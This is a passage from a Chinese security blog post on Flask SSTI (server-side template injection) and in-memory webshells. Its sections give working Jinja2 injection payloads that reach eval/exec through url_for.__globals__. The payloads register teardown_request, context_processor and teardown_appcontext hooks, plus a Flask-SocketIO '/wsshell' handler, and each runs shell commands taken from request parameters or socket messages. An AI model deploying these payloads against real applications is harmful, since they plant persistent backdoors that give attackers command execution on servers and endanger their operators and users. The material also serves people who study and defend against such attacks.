<h3 id="app-teardown-request"><a href="#app-teardown-request" class="headerlink" title="@app.teardown_request"></a>@app.teardown_request</h3><p>这个装饰器⽤于注册⼀个函数，该函数会在每次请求结束后调⽤，⽆论请求是否成功。拆卸函数的返 </p>
<p>回值将被忽略。在请求结束后 do_teardown_request 函数会被调⽤。这个函数的也是没有回显的，所 以可参考前⾯说到的⽅法。</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.teardown_request_funcs.setdefault(None, []).append(lambda exc:</span></span><br><span class="line"><span class="string">__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)) </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27; in request.args.keys() else None)&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], </span><br><span class="line"><span class="string">&#x27;ufg&#x27;</span>: url_for.__globals__,<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;) &#125;&#125;</span><br></pre></td></tr></table></figure></div>

<hr>
<h3 id="app-context-processor"><a href="#app-context-processor" class="headerlink" title="@app.context_processor"></a>@app.context_processor</h3><p>这个装饰器⽤于注册⼀个上下⽂处理器，该处理器返回的字典将合并到模板上下⽂中。最终操作的数 </p>
<p>据是 template_context_processors 或者啥它来注册在模板中使⽤的变量，当模板渲染的时候会⾃动调⽤这个函数得到⼀个字典。然后⽤ 字典⾥⾯的变量去替换模板中的内容。所以作为内存⻢使⽤的话就⽐较局限了。由 update_template_context 函数来操作 </p>
<p>payload：lambda函数⾥返回了⼀个字典，**键值是 ak47 **，要想拿到回显的话可以参考前⾯的内容，或 者使在有 SSTI 的地⽅使⽤。貌似也可以配合模板操作的装饰器实现回显。</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>]<span class="string">&quot;</span></span><br><span class="line"><span class="string">app.template_context_processors[None].append(lambda : &#123;&#x27;ak47&#x27;:</span></span><br><span class="line"><span class="string">__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read() </span></span><br><span class="line"><span class="string">if &#x27;cmd&#x27;in request.args.keys()is not None else None&#125;)&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>], </span><br><span class="line"><span class="string">&#x27;ufg&#x27;</span>: url_for.__globals__,<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;) &#125;&#125;</span><br></pre></td></tr></table></figure></div>

<hr>
<h3 id="app-teardown-appcontext"><a href="#app-teardown-appcontext" class="headerlink" title="@app.teardown_appcontext"></a>@app.teardown_appcontext</h3><p>装饰器标记的函数会在每次应⽤环境销毁时调⽤。操作的数据是 teardown_appcontext_funcs ，在请求结束销毁的时候由 do_teardown_appcontext() 函数调⽤，所以就很特殊，在这⾥调⽤的时候请求上 下⽂已经消失获取不到上下⽂包括传递的url参数，也就**⽆法控制内存马**，但是<strong>依然可以命令执⾏</strong>，不 过在每次请求的时候都会被调⽤。所以要么配合其他装饰器在这个装饰器的函数调用之前，将 request 对象保存到 Flask 的全局变量 g 中，然后再拿到参数。 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;g=ufg[&#x27;g&#x27;]</span></span><br><span class="line"><span class="string">app.teardown_request_funcs.setdefault(None, []).append(lambda exc: </span></span><br><span class="line"><span class="string">exec(&#x27;g.saved = &#123;\&#x27;path\&#x27;:request.path, \&#x27;args\&#x27;:request.args&#125;&#x27;) );</span></span><br><span class="line"><span class="string">app.teardown_appcontext_funcs.append(lambda exc:</span></span><br><span class="line"><span class="string">__import__(&#x27;os&#x27;).popen(g.saved[&#x27;args&#x27;].get(&#x27;cmd&#x27;))</span></span><br><span class="line"><span class="string">if &#x27;/shell&#x27;==g.saved[&#x27;path&#x27;] else exc )&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],</span><br><span class="line"><span class="string">&#x27;ufg&#x27;</span>: url_for.__globals__,<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;) &#125;&#125;</span><br></pre></td></tr></table></figure></div>

<p>没有回显。只有访问 &#x2F;shell?cmd&#x3D;calc 才会执⾏。回显问题依然参考前⾯的抛出异常啥的。这个可以弄 404 的。</p>
<h1 id="3-WebSocket内存🐎"><a href="#3-WebSocket内存🐎" class="headerlink" title="3.WebSocket内存🐎"></a>3.WebSocket内存🐎</h1><h2 id="Flask-socketio"><a href="#Flask-socketio" class="headerlink" title="Flask-socketio"></a>Flask-socketio</h2><p>由于 Flask 本身并不⽀持 websocket，只能通过第三⽅扩展如基于 socketio 开发的 flask-socketio实 现，还有⼀些花⾥胡哨的实现⽅法，在弄这个的时候想了⼀些办法来实现 websocket 的内存⻢。 </p>
<p>⼀种是如果端⼝能开放，使⽤ socket 实现⼀个伪 websocket，但是实际没有啥⽤。 </p>
<p>第⼆种就是这个 web 应⽤使⽤了扩展来⽀持 websocket，这⾥⽤ flask-socketio 来演示⼀下。它的基本⽤法如下，使⽤** @socketio.on 装饰器**，可以通过 <strong>namespace 来准许客户端在同⼀个 socket 上建 ⽴多个独⽴的链接</strong>；even_name 代表事件名称，可以⾃⼰定义，同时客户端连接的时候需要指定事件 发送消息。 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask_socketio <span class="keyword">import</span> SocketIO</span><br><span class="line">socketio = SocketIO(app, cors_allowed_origins=<span class="string">&quot;*&quot;</span>)</span><br><span class="line"><span class="meta">@socketio.on(<span class="params"><span class="string">&#x27;event_name&#x27;</span>, namespace=<span class="string">&#x27;/namespace&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">func_name</span>(<span class="params">message</span>):</span><br><span class="line"> send(&#123;<span class="string">&#x27;msg&#x27;</span>: <span class="string">&#x27;message info&#x27;</span>&#125;)</span><br><span class="line">socketio.run(app)</span><br></pre></td></tr></table></figure></div>

<p>客户端的⽤法 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">// 连接WebSocket</span><br><span class="line">var socket = io.connect(<span class="string">&#x27;http://domain:port/namespace&#x27;</span>);</span><br><span class="line">function sendMsg() &#123;</span><br><span class="line"> socket.emit(<span class="string">&#x27;event_name&#x27;</span>, &#123;<span class="string">&#x27;msg&#x27;</span>: <span class="string">&#x27;message info&#x27;</span>&#125;);&#125;</span><br><span class="line">// 接收消息事件</span><br><span class="line">socket.on(<span class="string">&#x27;message&#x27;</span>, function(data) &#123;</span><br><span class="line"> var p = document.createElement(<span class="string">&#x27;p&#x27;</span>);</span><br><span class="line"> p.innerHTML = data[<span class="string">&#x27;msg&#x27;</span>];</span><br><span class="line"> document.getElementById(<span class="string">&#x27;chat&#x27;</span>).appendChild(p);&#125;);</span><br></pre></td></tr></table></figure></div>

<p> handlers 可以通过 **url_for.<strong>globals</strong>.current_app.extensions[‘socketio’].server.handlers **来查看 </p>
<p>函数在调⽤的时候会传递⼀个两个参数，⼀个 request.sid ⼀个就是客户端发送的消息。 </p>
<p>以要实现 websocket 内存⻢只需要往handlers⾥⾯添加即可实现 </p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;<span class="string">&#x27;/namespace&#x27;</span>: &#123;<span class="string">&#x27;event_name&#x27;</span>: &lt;function &gt;&#125;&#125;</span><br></pre></td></tr></table></figure></div>



<h2 id="ws内存🐎实现"><a href="#ws内存🐎实现" class="headerlink" title="ws内存🐎实现"></a>ws内存🐎实现</h2><p>场景是有⼀个 SSTI 漏洞。使⽤下⾯这个 Payload 来添加⼀个⾃定义的 websocket 事件处理函数，命 名空间为 &#x2F;wsshell ，事件名为 shell ，事件函数需要的参数上⾯也有提到：e为 request sid ，d为客户 端发送的数据。</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">__import__(&#x27;builtins&#x27;).app_ctx= app.app_context();</span></span><br><span class="line"><span class="string">app.extensions[&#x27;socketio&#x27;].server.handlers[&#x27;/wsshell&#x27;] = &#123;&#x27;shell&#x27;:lambda s,d:</span></span><br><span class="line"><span class="string">__import__(&#x27;builtins&#x27;).app_ctx.app.extensions[&#x27;socketio&#x27;].send(&#123;&#x27;msg&#x27;:&#x27;&lt;pre&gt;&#123;0&#125;</span></span><br><span class="line"><span class="string">&lt;/pre&gt;&#x27;.format(__import__(&#x27;os&#x27;).popen(d[&#x27;cmd&#x27;]).read())&#125;,namespace=&#x27;/wsshell&#x27;)&#125;&quot;</span>,</span><br><span class="line">&#123;<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>] &#125;)</span><br></pre></td></tr></table></figure></div>

<p>payload</p>
<div class="code-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;exec&#x27;</span>](<span class="string">&quot;</span></span><br><span class="line"><span class="string">my_func= lambda d: __import__(&#x27;builtins&#x27;).app_ctx.app.extensions[&#x27;socketio&#x27;].send(&#123;&#x27;msg&#x27;:__import__(&#x27;os&#x27;).popen(d[&#x27;cmd&#x27;]).read()&#125;,namespace=&#x27;/wsshell&#x27;);</span></span><br><span class="line"><span class="string">__import__(&#x27;builtins&#x27;).app_ctx= app.app_context();</span></span><br><span class="line"><span class="string">app.extensions[&#x27;socketio&#x27;].server.handlers[&#x27;/wsshell&#x27;] = &#123;&#125;;</span></span><br><span class="line"><span class="string">app.extensions[&#x27;socketio&#x27;].server.handlers[&#x27;/wsshell&#x27;][&#x27;shell&#x27;]= lambda s,d:</span></span><br><span class="line"><span class="string">__import__(&#x27;flask_socketio&#x27;).SocketIO._handle_event</span></span><br><span class="line"><span class="string">(__import__(&#x27;builtins&#x27;).app_ctx.app.</span></span><br><span class="line"><span class="string">extensions[&#x27;socketio&#x27;], my_func, &#x27;shell&#x27;, &#x27;/wsshell&#x27;, s, d)&quot;</span>, </span><br><span class="line">&#123;<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>] &#125;)&#125;&#125;</span><br></pre></td></tr></table></figure></div>

		</div>

		
		<div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
			<div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> 深入解析SSTI模板注入</li>
        <li><strong>作者:</strong> kivvs</li>
        <li><strong>创建于
                :</strong> 2026-08-14 19:51:54</li>
        
            <li>
                <strong>更新于
                    :</strong> 2026-08-14 22:45:49
            </li>
        
        <li>
            <strong>链接:</strong> https://kivvs.github.io/2026/08/14/深入解析SSTI模板注入/
        </li>
        <li>
            <strong>
                版权声明:
            </strong>
            

            
                本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a> 进行许可。
            
        </li>
    </ul>
</div>

		</div>
		

		
		<ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
			
			<li class="tag-item mx-0.5">
				<a href="/tags/web/">#web</a>&nbsp;
			</li>
			
			<li class="tag-item mx-0.5">
				<a href="/tags/SSTI/">#SSTI</a>&nbsp;
			</li>
			
		</ul>
		

		

		
		<div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
			
			<div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="prev" rel="prev" href="/2026/08/14/%E6%B5%85%E8%B0%88RCE%E7%BB%95%E8%BF%87%E5%A7%BF%E5%8A%BF/">
					<span class="left arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-left"></i>
					</span>
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">浅谈RCE绕过姿势</span>
						<span class="post-nav-item">上一篇</span>
					</span>
				</a>
			</div>
			
			
			<div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
				<a class="next" rel="next" href="/2026/08/14/PHP%E5%8E%9F%E7%94%9F%E7%B1%BB%E6%B1%87%E6%80%BB/">
					<span class="title flex justify-center items-center">
						<span class="post-nav-title-item truncate max-w-48">PHP原生类汇总</span>
						<span class="post-nav-item">下一篇</span>
					</span>
					<span class="right arrow-icon flex justify-center items-center">
						<i class="fa-solid fa-chevron-right"></i>
					</span>
				</a>
			</div>
			
		</div>
		


		
		<div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
			<div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        评论
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.js';

      (function() {
        const startPath = location.pathname;
        const startTime = Date.now();
        const retryDelay = 200;
        const retryLimit = 5000;

        const runWaline = () => {
          if (location.pathname !== startPath) {
            return;
          }

          const container = document.getElementById('waline');
          if (!container) {
            if (Date.now() - startTime < retryLimit) {
              setTimeout(runWaline, retryDelay);
            }
            return;
          }

          if (window.redefineWalineInstance?.destroy) {
            window.redefineWalineInstance.destroy();
          }

          container.innerHTML = '';
          window.redefineWalineInstance = init({
            el: '#waline',
            serverURL: 'https://example.example.com',
            path: location.pathname,
            dark: 'body[class~="dark-mode"]',
            reaction: false,
            requiredMeta: ['nick', 'mail'],
            emoji: [],
                      lang: 'zh-CN',
          });
        };

        runWaline();
      })();
    </script>



        
    
</div>

		</div>
		
	</div>

	
	<div class="toc-content-container">
		<div class="post-toc-wrap">
	<div class="post-toc">
		<div class="toc-title">目录</div>
		<div class="page-title">深入解析SSTI模板注入</div>
		<ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-%E6%B7%B1%E5%85%A5%E8%A7%A3%E6%9E%90SSTI%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5"><span class="nav-text">1.深入解析SSTI模板注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-Flask%E4%B8%AD%E7%9A%84%E5%86%85%E5%AD%98%F0%9F%90%8E"><span class="nav-text">2.Flask中的内存🐎</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8A%A8%E6%80%81%E6%B3%A8%E5%86%8C%E8%B7%AF%E7%94%B1-app-route-add-url-rule"><span class="nav-text">动态注册路由 @app.route - add_url_rule</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9%E8%A7%86%E5%9B%BE%E5%87%BD%E6%95%B0-app-endpoint"><span class="nav-text">修改视图函数 @app.endpoint</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%AF%B7%E6%B1%82%E6%8B%A6%E6%88%AA%E8%B7%AF%E7%94%B1%E5%86%85%E5%AD%98%E2%BB%A2"><span class="nav-text">请求拦截路由内存⻢</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#app-errorhandler"><span class="nav-text">@app.errorhandler</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#app-url-value-preprocessor"><span class="nav-text">@app.url_value_preprocessor</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#app-before-request"><span class="nav-text">@app.before_request</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#app-after-request"><span class="nav-text">@app.after_request</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#app-teardown-request"><span class="nav-text">@app.teardown_request</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#app-context-processor"><span class="nav-text">@app.context_processor</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#app-teardown-appcontext"><span class="nav-text">@app.teardown_appcontext</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#3-WebSocket%E5%86%85%E5%AD%98%F0%9F%90%8E"><span class="nav-text">3.WebSocket内存🐎</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Flask-socketio"><span class="nav-text">Flask-socketio</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ws%E5%86%85%E5%AD%98%F0%9F%90%8E%E5%AE%9E%E7%8E%B0"><span class="nav-text">ws内存🐎实现</span></a></li></ol></li></ol>

	</div>
</div>
	</div>
	
</div>

			</div>

			
		</div>

		<div class="main-content-footer">
			<footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">kivvs</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        共撰写了 20 篇文章
                    </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">访问人数</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">总访问量</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a> 驱动</span>
            <span class="text-sm lg:block">主题&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.9.0</a></span>
        </div>
        
        
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
		</div>
	</div>

	
	<div class="post-tools">
		<div class="post-tools-container">
	<ul class="article-tools-list">
		<!-- TOC aside toggle -->
		
		<li class="right-bottom-tools page-aside-toggle">
			<i class="fa-regular fa-outdent"></i>
		</li>
		

		<!-- go comment -->
		
		<li class="go-comment">
			<i class="fa-regular fa-comments"></i>
		</li>
		
	</ul>
</div>
	</div>
	

	<div class="right-side-tools-container">
		<div class="side-tools-container">
	<ul class="hidden-tools-list">
		<li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-plus"></i>
		</li>

		<li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
			<i class="fa-regular fa-magnifying-glass-minus"></i>
		</li>

		<li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
			<i class="fa-regular fa-moon"></i>
		</li>

		<!-- rss -->
		

		

		<li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
			<i class="fa-regular fa-arrow-down"></i>
		</li>
	</ul>

	<ul class="visible-tools-list">
		<li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
			<i class="fa-regular fa-cog fa-spin"></i>
		</li>
		
		<li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
			<i class="arrow-up fas fa-arrow-up"></i>
			<span class="percent"></span>
		</li>
		
		
	</ul>
</div>
	</div>

	<div class="image-viewer-container" role="dialog" aria-modal="true" aria-label="图片查看器">
	<button class="image-viewer-close" type="button" aria-label="关闭">
		<i class="fa-solid fa-xmark"></i>
	</button>
	<button class="image-viewer-prev" type="button" aria-label="上一页">
		<i class="fa-solid fa-chevron-left"></i>
	</button>
	<div class="image-viewer-frame">
		<img src="" alt="">
	</div>
	<div class="image-viewer-exif-panel hidden absolute left-1/2 bottom-20 -translate-x-1/2 w-[min(92vw,420px)] max-h-[60vh] overflow-hidden rounded-2xl bg-background-color-transparent-80 p-4 text-left shadow-redefine-flat backdrop-blur-md" role="dialog" aria-label="EXIF" aria-hidden="true">
		<div class="flex items-center justify-between mb-3">
			<span class="text-sm font-semibold text-first-text-color">EXIF</span>
			<button class="image-viewer-exif-close flex h-8 w-8 items-center justify-center rounded-full bg-background-color-transparent-80 text-first-text-color transition hover:bg-background-color-transparent-40" type="button" aria-label="关闭">
				<i class="fa-solid fa-xmark text-[0.65rem]"></i>
			</button>
		</div>
		<div class="image-viewer-exif-cards grid grid-cols-1 sm:grid-cols-2 gap-3 max-h-[50vh] overflow-y-auto pr-1 scrollbar-hide"></div>
		<template class="image-viewer-exif-card-template">
			<div class="rounded-lg bg-background-color-transparent-40 px-3 py-2">
				<div class="image-viewer-exif-card-header flex items-center gap-2 mb-1">
					<i class="image-viewer-exif-card-icon fa-solid fa-circle-info text-xs text-third-text-color"></i>
					<div class="image-viewer-exif-card-title text-xs font-semibold text-first-text-color"></div>
				</div>
				<div class="image-viewer-exif-card-items flex flex-col gap-1"></div>
			</div>
		</template>
	</div>
	<button class="image-viewer-exif-toggle flex items-center gap-2 hidden absolute left-1/2 bottom-6 -translate-x-1/2 rounded-full border border-border-color bg-background-color-transparent-80 px-4 py-2 text-first-text-color backdrop-blur-md transition hover:bg-background-color-transparent-40" type="button" aria-label="EXIF" aria-expanded="false">
		<i class="fa-solid fa-circle-info text-xs"></i>
		<span class="text-xs font-semibold uppercase tracking-wider">EXIF</span>
	</button>
	<button class="image-viewer-next" type="button" aria-label="下一页">
		<i class="fa-solid fa-chevron-right"></i>
	</button>
</div>


	

</main>



<script src="/js/build/libs/Swup.min.js"></script>

<script src="/js/build/libs/SwupSlideTheme.min.js"></script>

<script src="/js/build/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/build/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/build/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/build/libs/SwupPreloadPlugin.min.js"></script>

<script>
    window.swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });

    window.dispatchEvent(
        new CustomEvent("redefine:swup:ready", {
            detail: {
                swup: window.swup,
            },
        }),
    );
</script>




	
<script src="/js/build/main.js" type="module"></script>



    
<script src="/js/build/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">















<script src="/js/build/libs/moment-with-locales.min.js" data-swup-reload-script=""></script>



	
</body>

</html>